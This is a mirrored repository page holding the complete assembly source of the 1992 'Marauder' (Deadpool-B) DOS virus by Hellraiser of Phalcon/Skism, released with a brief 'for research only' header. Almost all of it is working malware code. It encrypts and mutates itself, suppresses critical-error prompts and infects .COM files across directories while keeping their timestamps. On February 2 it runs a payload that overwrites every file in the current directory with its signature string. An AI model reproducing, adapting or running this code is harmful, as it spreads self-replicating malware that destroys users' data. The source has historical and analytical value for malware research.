mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-11 21:05:28 +00:00
611 lines
18 KiB
NASM
611 lines
18 KiB
NASM
|
; "Marauder" Virus
|
||
|
; AKA Deadpool-B
|
||
|
;
|
||
|
; By Hellraiser
|
||
|
; Of Phalcon/Skism
|
||
|
;
|
||
|
; For virus reseach only
|
||
|
;
|
||
|
; I always wanted to release this source, so here it is. Now that it's been caught
|
||
|
; take a look at whats inside.
|
||
|
;
|
||
|
; I know it's no great thing, but it's good to learn from. It contains basic
|
||
|
; encryption, mutation, and INT 24 handling.
|
||
|
;
|
||
|
; I will be very upset if I see 100 new versions of this code with some lame kids
|
||
|
; name in place of mine. So just use it to learn from, it's very straight foward.
|
||
|
|
||
|
|
||
|
|
||
|
code segment 'code'
|
||
|
assume cs:code, ds:code, ss:code, es:code
|
||
|
org 0100h
|
||
|
|
||
|
dta EQU endcode + 10
|
||
|
headlength EQU headend - headstart
|
||
|
bodylength EQU bodyend - bodystart
|
||
|
encryptpart EQU bodyend - mixed_up
|
||
|
part1size EQU part2 - part1
|
||
|
part2size EQU parta - part2
|
||
|
partasize EQU partb - parta
|
||
|
partbsize EQU dude - partb
|
||
|
mutants EQU chris - part1
|
||
|
total_mutant EQU mutants / 2
|
||
|
encryptlength EQU encryptpart / 2
|
||
|
virus_size EQU headlength + bodylength + 5 ; head + body + int24 + 2
|
||
|
drive EQU endcode + 110
|
||
|
backslash EQU endcode + 111
|
||
|
orig_path EQU endcode + 113
|
||
|
dirdta EQU orig_path + 66
|
||
|
myid EQU 88h
|
||
|
toolarge EQU 65535 - virus_size
|
||
|
fileattr EQU 21
|
||
|
filetime EQU 22
|
||
|
filedate EQU 24
|
||
|
filename EQU 30
|
||
|
|
||
|
headstart:
|
||
|
|
||
|
jmp bodystart
|
||
|
db myid
|
||
|
headend:
|
||
|
|
||
|
realprogramstart:
|
||
|
db 90h, 90h, 90h
|
||
|
db 0cdh, 020h, 1ah, 1ah
|
||
|
realprogramend:
|
||
|
|
||
|
bodystart:
|
||
|
call deadpool
|
||
|
deadpool:
|
||
|
pop si
|
||
|
sub si,offset deadpool
|
||
|
call encrypt
|
||
|
jmp chris
|
||
|
|
||
|
enc_code dw 0000h
|
||
|
|
||
|
encrypt proc near
|
||
|
assume cs:code, ds:code, es:code, ss:code
|
||
|
|
||
|
part1_:
|
||
|
push ax
|
||
|
push bx
|
||
|
push cx
|
||
|
push dx
|
||
|
mov cx, encryptlength
|
||
|
mov bp, si
|
||
|
add si, offset bodyend
|
||
|
mov di,si
|
||
|
std
|
||
|
xor_loop:
|
||
|
lodsw
|
||
|
xor ax, [bp + enc_code]
|
||
|
stosw
|
||
|
loop xor_loop
|
||
|
done_:
|
||
|
mov si, bp
|
||
|
pop dx
|
||
|
pop cx
|
||
|
pop bx
|
||
|
pop ax
|
||
|
|
||
|
ret
|
||
|
;nop
|
||
|
|
||
|
encrypt endp
|
||
|
|
||
|
|
||
|
infect proc near
|
||
|
|
||
|
call encrypt
|
||
|
int 21h
|
||
|
call encrypt
|
||
|
ret
|
||
|
|
||
|
infect endp
|
||
|
|
||
|
|
||
|
mixed_up:
|
||
|
|
||
|
|
||
|
|
||
|
part1:
|
||
|
push dx
|
||
|
push cx
|
||
|
push bx
|
||
|
push ax
|
||
|
mov cx, encryptlength
|
||
|
mov bp, si
|
||
|
add si, offset mixed_up
|
||
|
mov di,si
|
||
|
cld
|
||
|
|
||
|
part2:
|
||
|
mov si, bp
|
||
|
pop ax
|
||
|
pop bx
|
||
|
pop cx
|
||
|
pop dx
|
||
|
|
||
|
|
||
|
|
||
|
parta:
|
||
|
mov bp, si
|
||
|
add si, offset endcode
|
||
|
mov di, si
|
||
|
push ax
|
||
|
push bx
|
||
|
push cx
|
||
|
push dx
|
||
|
mov cx, encryptlength
|
||
|
std
|
||
|
|
||
|
partb:
|
||
|
pop dx
|
||
|
pop cx
|
||
|
pop bx
|
||
|
pop ax
|
||
|
mov si, bp
|
||
|
|
||
|
|
||
|
dude:
|
||
|
|
||
|
; don't get any ideas lamer
|
||
|
|
||
|
hellraiser label byte
|
||
|
idbuffer db 0cdh, 20h,' [Marauder] 1992 Hellraiser - Phalcon/Skism. '
|
||
|
stringsize EQU ($ - hellraiser)
|
||
|
|
||
|
chris:
|
||
|
|
||
|
push es
|
||
|
mov ax,3524h
|
||
|
int 21h
|
||
|
mov [si + word ptr oint24], bx
|
||
|
mov [si + word ptr oint24 + 2], es
|
||
|
pop es
|
||
|
|
||
|
mov ax, 2524h
|
||
|
lea dx, [si + newint24]
|
||
|
int 21h
|
||
|
|
||
|
push si
|
||
|
mov ah, 47h
|
||
|
xor dl,dl
|
||
|
add si, offset orig_path
|
||
|
int 21h
|
||
|
|
||
|
pop si
|
||
|
mov ah,19h
|
||
|
int 21h
|
||
|
|
||
|
add al, 41h
|
||
|
mov byte ptr [si + offset drive], al
|
||
|
|
||
|
mov ax, '\:'
|
||
|
mov word ptr [si + offset backslash], ax
|
||
|
|
||
|
;mov byte ptr [si + offset defaultdrive], al
|
||
|
|
||
|
|
||
|
; here's my new tri-dimensional jmp displacement theory in play
|
||
|
|
||
|
push si
|
||
|
pop bp
|
||
|
|
||
|
lea si, [bp + offset oldjmp]
|
||
|
lea di, [bp + offset thisjmp]
|
||
|
mov cx,04h
|
||
|
cld
|
||
|
rep movsb
|
||
|
|
||
|
push bp
|
||
|
pop si
|
||
|
why:
|
||
|
|
||
|
mov ah,1ah
|
||
|
lea dx,[si + dta]
|
||
|
int 21h
|
||
|
|
||
|
mov ah,2ah
|
||
|
int 21h
|
||
|
|
||
|
cmp dx, 0202h
|
||
|
jne ff
|
||
|
jmp smash
|
||
|
|
||
|
ff:
|
||
|
mov ah,4eh
|
||
|
lea dx,[si + filespec]
|
||
|
mov cx, 07h
|
||
|
|
||
|
searchloop:
|
||
|
|
||
|
int 21h
|
||
|
jnc here
|
||
|
;jmp up
|
||
|
|
||
|
|
||
|
|
||
|
mov ah,1ah
|
||
|
lea dx,[si + dirdta]
|
||
|
int 21h
|
||
|
|
||
|
mov ah,3bh
|
||
|
lea dx,[si + offset rootdir]
|
||
|
int 21h
|
||
|
jc at_root
|
||
|
jmp why
|
||
|
|
||
|
at_root:
|
||
|
cmp byte ptr [si + donebefore], 01h
|
||
|
je notokey
|
||
|
|
||
|
mov al,01h
|
||
|
mov [si + donebefore], al
|
||
|
|
||
|
mov ah,4eh
|
||
|
xor cx,cx
|
||
|
mov cl,13h
|
||
|
|
||
|
|
||
|
lea dx, [si + dwildcards]
|
||
|
ffdloop:
|
||
|
|
||
|
int 21h
|
||
|
jnc okey
|
||
|
jmp far ptr nofilesfound
|
||
|
|
||
|
notokey:
|
||
|
mov ah,4fh
|
||
|
jmp ffdloop
|
||
|
|
||
|
okey:
|
||
|
mov ah,3bh
|
||
|
lea dx, [si + offset dirdta + filename]
|
||
|
int 21h
|
||
|
jc notokey
|
||
|
jmp why
|
||
|
|
||
|
|
||
|
here:
|
||
|
|
||
|
mov bx, word ptr [si + offset dta + fileattr]
|
||
|
mov word ptr [si + origattr], bx
|
||
|
|
||
|
mov ax,4301h
|
||
|
xor cx,cx
|
||
|
lea dx, [si + offset dta + filename]
|
||
|
int 21h
|
||
|
jc bad_file2
|
||
|
|
||
|
call openfile
|
||
|
jc bad_file2
|
||
|
|
||
|
mov word ptr [si + offset handle], ax
|
||
|
|
||
|
mov bx, word ptr [si + offset dta + filedate]
|
||
|
mov word ptr [si + origdate], bx
|
||
|
mov bx, word ptr [si + offset dta + filetime]
|
||
|
mov word ptr [si + origtime], bx
|
||
|
|
||
|
xchg bx, ax
|
||
|
|
||
|
mov ah, 3fh
|
||
|
mov cx, 4
|
||
|
lea dx, [si + oldjmp]
|
||
|
int 21h
|
||
|
|
||
|
cmp byte ptr [si + offset oldjmp + 3], myid
|
||
|
jne sick_of_it_all
|
||
|
|
||
|
bad_file:
|
||
|
mov ax,4301h
|
||
|
mov cx, word ptr [si + offset origattr]
|
||
|
lea dx, [si + offset dta + filename]
|
||
|
xor ch,ch
|
||
|
int 21h
|
||
|
|
||
|
mov ah,3eh
|
||
|
int 21h
|
||
|
|
||
|
bad_file2:
|
||
|
cmp ax, 05h
|
||
|
je dumb
|
||
|
cmp ax, 02h
|
||
|
je dumb
|
||
|
mov ah, 4fh
|
||
|
jmp searchloop
|
||
|
dumb:
|
||
|
jmp nofilesfound
|
||
|
|
||
|
sick_of_it_all:
|
||
|
|
||
|
cmp word ptr [si + offset oldjmp], 5a4dh
|
||
|
je bad_file
|
||
|
|
||
|
call seekeof
|
||
|
|
||
|
cmp ax,0010h
|
||
|
jb bad_file
|
||
|
cmp ax, toolarge
|
||
|
jae bad_file
|
||
|
|
||
|
|
||
|
sub ax,03h
|
||
|
mov [si + newjmp + 2], ah
|
||
|
mov [si + newjmp+ 1], al
|
||
|
mov [si + newjmp + 3], myid
|
||
|
mov ah, 0e9h
|
||
|
mov [si + newjmp], ah
|
||
|
|
||
|
xor al,al
|
||
|
mov [si + donebefore], al
|
||
|
|
||
|
inc word ptr [si + generation]
|
||
|
|
||
|
mov bp, si
|
||
|
call enc_enc
|
||
|
|
||
|
tryagain:
|
||
|
mov ah,2ch
|
||
|
int 21h
|
||
|
cmp dx, 0000h
|
||
|
je tryagain
|
||
|
mov word ptr [si + offset enc_code], dx
|
||
|
|
||
|
|
||
|
mov cl, 8
|
||
|
ror dx, cl
|
||
|
mov word ptr [si + offset mutantcode], dx
|
||
|
|
||
|
cmp dl, 30
|
||
|
jng encrypt_a
|
||
|
jmp encrypt_b
|
||
|
|
||
|
|
||
|
encrypt_a:
|
||
|
;mov bp, si
|
||
|
|
||
|
lea si,[bp + offset part1]
|
||
|
lea di,[bp + offset part1_]
|
||
|
mov cx, part1size
|
||
|
call dostring
|
||
|
lea si,[bp + offset part2]
|
||
|
lea di,[bp + offset done_]
|
||
|
|
||
|
mov cx, part2size
|
||
|
call dostring
|
||
|
|
||
|
jmp attach
|
||
|
|
||
|
encrypt_b:
|
||
|
|
||
|
lea si,[bp + offset parta]
|
||
|
lea di,[bp + offset part1_]
|
||
|
mov cx, part1size
|
||
|
call dostring
|
||
|
|
||
|
lea si,[bp + offset partb]
|
||
|
lea di,[bp + offset done_]
|
||
|
mov cx, part2size
|
||
|
call dostring
|
||
|
|
||
|
attach:
|
||
|
call enc_enc
|
||
|
|
||
|
mov si,bp
|
||
|
mov ah,40h
|
||
|
mov cx, bodyend - bodystart
|
||
|
add cx, 5
|
||
|
lea dx,[si + bodystart]
|
||
|
call infect
|
||
|
jc close_file
|
||
|
|
||
|
|
||
|
call seektof
|
||
|
|
||
|
mov ah,40h
|
||
|
mov cx, 4
|
||
|
lea dx,[si + offset newjmp]
|
||
|
int 21h
|
||
|
|
||
|
close_file:
|
||
|
|
||
|
|
||
|
mov ax,5701h
|
||
|
mov cx, word ptr [si + offset origtime]
|
||
|
mov dx, word ptr [si + offset origdate]
|
||
|
mov bx, word ptr [si + offset handle]
|
||
|
int 21h
|
||
|
|
||
|
mov ah, 3eh
|
||
|
int 21h
|
||
|
|
||
|
mov ax,4301h
|
||
|
mov cx, word ptr [si + offset origattr]
|
||
|
lea dx, [si + offset dta + filename]
|
||
|
xor ch,ch
|
||
|
int 21h
|
||
|
|
||
|
|
||
|
nofilesfound:
|
||
|
|
||
|
mov ah, 03bh
|
||
|
lea dx, [si + offset drive]
|
||
|
int 21h
|
||
|
|
||
|
restoredta:
|
||
|
mov ah, 1ah
|
||
|
mov dx, 080h
|
||
|
int 21h
|
||
|
|
||
|
push si
|
||
|
pop bp
|
||
|
|
||
|
mov ax, 2524h
|
||
|
lea dx, [si + oint24]
|
||
|
int 21h
|
||
|
|
||
|
lea si,[bp + offset thisjmp]
|
||
|
mov di,100h
|
||
|
|
||
|
mov cx,04h
|
||
|
cld
|
||
|
rep movsb
|
||
|
|
||
|
mov di, 0100h
|
||
|
jmp di
|
||
|
|
||
|
smash proc near
|
||
|
|
||
|
call enc_enc
|
||
|
mov ah, 4eh
|
||
|
mov cx, 07h
|
||
|
lea dx, [si + offset dwildcards] ;
|
||
|
|
||
|
r_loop:
|
||
|
int 21h
|
||
|
jc restoredta
|
||
|
|
||
|
call kill
|
||
|
|
||
|
mov ah, 4fh
|
||
|
jmp r_loop
|
||
|
|
||
|
smash endp
|
||
|
|
||
|
dostring proc near
|
||
|
|
||
|
cld
|
||
|
rep movsb
|
||
|
ret
|
||
|
|
||
|
dostring endp
|
||
|
|
||
|
|
||
|
enc_enc proc near
|
||
|
|
||
|
mov si, bp
|
||
|
add si, offset part1
|
||
|
mov di, si
|
||
|
mov cx, total_mutant
|
||
|
|
||
|
loop_xor:
|
||
|
lodsw
|
||
|
xor ax, [bp + mutantcode] ;
|
||
|
stosw
|
||
|
loop loop_xor
|
||
|
|
||
|
mov si, bp
|
||
|
ret
|
||
|
|
||
|
enc_enc endp
|
||
|
|
||
|
seektof proc near
|
||
|
|
||
|
mov ax,4200h
|
||
|
xor cx,cx
|
||
|
xor dx,dx
|
||
|
int 21h
|
||
|
|
||
|
ret
|
||
|
|
||
|
seektof endp
|
||
|
|
||
|
|
||
|
seekeof proc near
|
||
|
|
||
|
mov ax,4202h
|
||
|
xor dx,dx
|
||
|
xor cx,cx
|
||
|
int 21h
|
||
|
|
||
|
ret
|
||
|
|
||
|
seekeof endp
|
||
|
|
||
|
|
||
|
openfile proc near
|
||
|
|
||
|
mov ax,3d02h
|
||
|
lea dx, [si + offset dta + filename]
|
||
|
int 21h
|
||
|
|
||
|
ret
|
||
|
|
||
|
openfile endp
|
||
|
|
||
|
kill proc near
|
||
|
|
||
|
call openfile
|
||
|
jc return
|
||
|
mov bx, ax
|
||
|
|
||
|
push bx
|
||
|
|
||
|
call seekeof
|
||
|
|
||
|
mov bx, stringsize
|
||
|
div bx
|
||
|
mov cx, ax
|
||
|
pop bx
|
||
|
push cx
|
||
|
|
||
|
call seektof
|
||
|
pop cx
|
||
|
|
||
|
|
||
|
loop_:
|
||
|
push cx
|
||
|
mov ah, 40h
|
||
|
mov cx, stringsize
|
||
|
lea dx, [si + offset idbuffer]
|
||
|
int 21h
|
||
|
jc ender
|
||
|
pop cx
|
||
|
dec cx
|
||
|
jcxz ender
|
||
|
jmp loop_
|
||
|
ender:
|
||
|
|
||
|
mov ah, 3eh
|
||
|
int 21h
|
||
|
|
||
|
return:
|
||
|
ret
|
||
|
|
||
|
kill endp
|
||
|
|
||
|
|
||
|
filespec db '*.COM',0
|
||
|
dwildcards db '*.*',0
|
||
|
rootdir db '..',0
|
||
|
generation dw 0000
|
||
|
origdate dw ?
|
||
|
origtime dw ?
|
||
|
origattr db ?
|
||
|
handle dw ?
|
||
|
defaultdrive db ?
|
||
|
oldjmp db 09h, 0cdh, 020h, 90h
|
||
|
thisjmp db 4 dup (?)
|
||
|
newjmp db 4 dup (?)
|
||
|
mutantcode dw 0000
|
||
|
donebefore db 00
|
||
|
oint24 dd 00
|
||
|
|
||
|
bodyend:
|
||
|
|
||
|
; not encrypted
|
||
|
|
||
|
newint24:
|
||
|
xor al,al
|
||
|
iret
|
||
|
endcode:
|
||
|
|
||
|
code ends
|
||
|
end headstart
|
||
|
|
||
|
|